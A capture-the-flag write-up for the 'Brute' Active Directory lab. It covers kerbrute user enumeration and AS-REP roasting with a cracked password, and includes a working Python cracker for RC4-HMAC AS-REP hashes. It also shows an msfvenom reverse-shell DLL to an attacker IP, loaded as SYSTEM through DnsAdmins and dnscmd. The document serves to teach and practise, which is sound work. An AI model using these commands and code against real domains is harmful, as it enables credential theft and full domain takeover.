CyberSecLabs - Brute

⇒ Brute was a medium Active Directory machine created by “wtfitsaduck” that taught us:

  • How to enumerate AD users with kerbrute and a username wordlist to identify valid accounts
  • Checking which of those users have DONT_REQ_PREAUTH set and AS-REP roasting them with GetNPUsers
  • Privilege escalation from the DnsAdmins group to SYSTEM on the domain controller (and therefore Domain Admin)


Enumerating Users and AS-REP Roasting

⇒ We enumerated SMB and ran LDAP queries but came up empty handed. Next we ran kerbrute with a username wordlist (from SecLists) to identify valid users. kerbrute works by sending AS-REQs without pre-authentication: the KDC answers differently for an unknown principal, a known principal that requires pre-authentication, and a known principal that does not, so it both confirms which names exist and flags any account with DONT_REQ_PREAUTH set. Those accounts can be AS-REP roasted with impacket's GetNPUsers.py (this is AS-REP roasting, not Kerberoasting, which targets accounts with SPNs):

./kerbrute_linux_amd64 userenum -d brute.csl --dc <DC IP> names.txt

  • Next we AS-REP roast the accounts that have DONT_REQ_PREAUTH set using impacket's GetNPUsers.py. Because no pre-authentication is required, the KDC hands back an AS-REP whose enc-part is encrypted only with the user's long-term key (the NT hash for RC4-HMAC), and that blob can be cracked offline with john or hashcat.

python3 GetNPUsers.py -dc-ip <DC IP> brute.csl/ -usersfile users.txt -format hashcat -outputfile test11.txt

  • Cracking the output file with john recovers the password:

tess : Unique1
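
The offline step john performs above, as an added example that is not part of this writeup or of impacket: a small cracker for the etype 23 (RC4-HMAC) AS-REP hashes that GetNPUsers prints in hashcat format. It implements the RFC 4757 key derivation (NT hash, K1 from the key-usage number, K3 from the checksum) so that each password guess can be verified by decrypting the enc-part and recomputing the HMAC. The sample hash is constructed inside the script for the user tess with the password Unique1 from this box (the encrypted plaintext is a stand-in, not a real EncASRepPart), and the wordlist is constructed too.

```python
import hashlib
import hmac
import struct

# Added example, not code from the writeup or from impacket: a from-scratch
# cracker for the etype 23 (RC4-HMAC) AS-REP hashes that GetNPUsers prints as
# $krb5asrep$23$user@REALM:<checksum>$<edata>. It shows why DONT_REQ_PREAUTH
# matters: the AS-REP enc-part is keyed only by the user's NT hash, so any guess
# can be verified offline. The sample hash, plaintext and wordlist are constructed.

MASK32 = 0xFFFFFFFF
KU_AS_REP_ENC_PART = 8  # RC4-HMAC (MS) key-usage number for the AS-REP enc-part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled on OpenSSL 3."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(48):
            j = i % 16
            if i < 16:    # round 1: F, words in natural order, no constant
                fn, k, s, t = (b & c) | (~b & d), j, (3, 7, 11, 19)[j % 4], 0
            elif i < 32:  # round 2: G, words read down the columns of the 4x4 table
                fn, k = (b & c) | (b & d) | (c & d), (j % 4) * 4 + j // 4
                s, t = (3, 5, 9, 13)[j % 4], 0x5A827999
            else:         # round 3: H, words in bit-reversed order
                fn, k = b ^ c ^ d, int(f"{j:04b}"[::-1], 2)
                s, t = (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + fn + x[k] + t) & MASK32, s), b, c
        a0, b0, c0, d0 = ((a0 + a) & MASK32, (b0 + b) & MASK32,
                          (c0 + c) & MASK32, (d0 + d) & MASK32)
    return struct.pack("<4I", a0, b0, c0, d0)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR (encryption and decryption are the same operation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """RC4-HMAC long-term key = NT hash = MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encryption: checksum || RC4(K3, confounder || plaintext).
    Used only to build the sample AS-REP enc-part the way a KDC would."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(k1, data)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def parse_asrep_hash(line: str):
    """Split '$krb5asrep$23$user@REALM:<cksum hex>$<edata hex>' into its parts."""
    head, _, body = line.strip().partition(":")
    _, kind, etype, principal = head.split("$")
    if kind != "krb5asrep" or etype != "23":
        raise ValueError("only etype 23 (RC4-HMAC) AS-REP hashes are handled here")
    cksum_hex, _, edata_hex = body.partition("$")
    return principal, bytes.fromhex(cksum_hex), bytes.fromhex(edata_hex)


def check_password(password: str, checksum: bytes, edata: bytes) -> bool:
    """Offline check: derive K1/K3 from the guess, decrypt, recompute the HMAC
    over confounder || plaintext and compare it with the transmitted checksum."""
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", KU_AS_REP_ENC_PART))
    k3 = hmac_md5(k1, checksum)
    decrypted = rc4(k3, edata)
    return hmac.compare_digest(hmac_md5(k1, decrypted), checksum)


def crack_asrep(line: str, wordlist):
    """Return (principal, password) for the first wordlist entry that verifies."""
    principal, checksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if check_password(candidate, checksum, edata):
            return principal, candidate
    return principal, None


def build_sample_hash(principal: str, password: str) -> str:
    """Constructed sample in GetNPUsers' hashcat format. A real enc-part is a DER
    EncASRepPart; the cracking logic never looks inside it, so a stand-in is fine."""
    confounder = bytes(range(8))  # a real KDC uses 8 random bytes
    plaintext = b"constructed stand-in for EncASRepPart (session key, times, ...)"
    blob = rc4_hmac_encrypt(nt_hash(password), KU_AS_REP_ENC_PART, plaintext, confounder)
    return f"$krb5asrep$23${principal}:{blob[:16].hex()}${blob[16:].hex()}"


SAMPLE_HASH = build_sample_hash("tess@BRUTE.CSL", "Unique1")
SAMPLE_WORDLIST = ["password", "Summer2020", "brute", "Unique1", "Welcome1"]

if __name__ == "__main__":
    print(SAMPLE_HASH)
    print(crack_asrep(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The only secret material involved is the user's NT hash, which is why a weak password on a DONT_REQ_PREAUTH account is effectively exposed to anyone who can reach the KDC. The check is limited to etype 23; AES (etype 17/18) AS-REPs use a PBKDF2-derived key and a different hash format.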

⇒ Now we have credentials for the user tess, and since WinRM is exposed we can connect to the machine as tess using evil-winrm.

Privilege Escalation to SYSTEM [ Exploiting the DnsAdmins Group ]

⇒ We discover that tess is a member of the DnsAdmins group. Members of this group may configure a server-level plugin DLL on the DNS server, and the DNS service, which runs as SYSTEM on the domain controller, loads that DLL when it next starts. We can leverage this to escalate to SYSTEM on the DC, which is equivalent to Domain Admin. This is a fantastic blog post on how to exploit it:

  • First we generate the DLL payload with msfvenom (an unstaged x64 reverse shell; the DNS service is a 64-bit process, so a 32-bit DLL would not load) and start a listener on port 7777 before going any further:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker IP> LPORT=7777 --platform windows -f dll > enox.dll

  • Next we register the DLL as a server-level plugin with dnscmd. This only writes the path into the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters; nothing is loaded until the service restarts. Use the full path of the DLL we uploaded, and make sure the DNS service can read it:

dnscmd.exe /config /serverlevelplugindll C:\Users\Tess\Documents\enox.dll

  • Now we restart the DNS service so that it loads the plugin. DnsAdmins membership by itself does not grant the right to stop and start the service; it works here because tess has that right on this box, and where it is missing you would have to wait for (or otherwise provoke) a restart:

    sc.exe stop dns

    sc.exe start dns

⇒ Once the service restarts and loads our plugin, we get a reverse shell as NT AUTHORITY\SYSTEM on the domain controller. Afterwards, delete the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters again, otherwise the DNS service keeps trying to load our DLL on every start: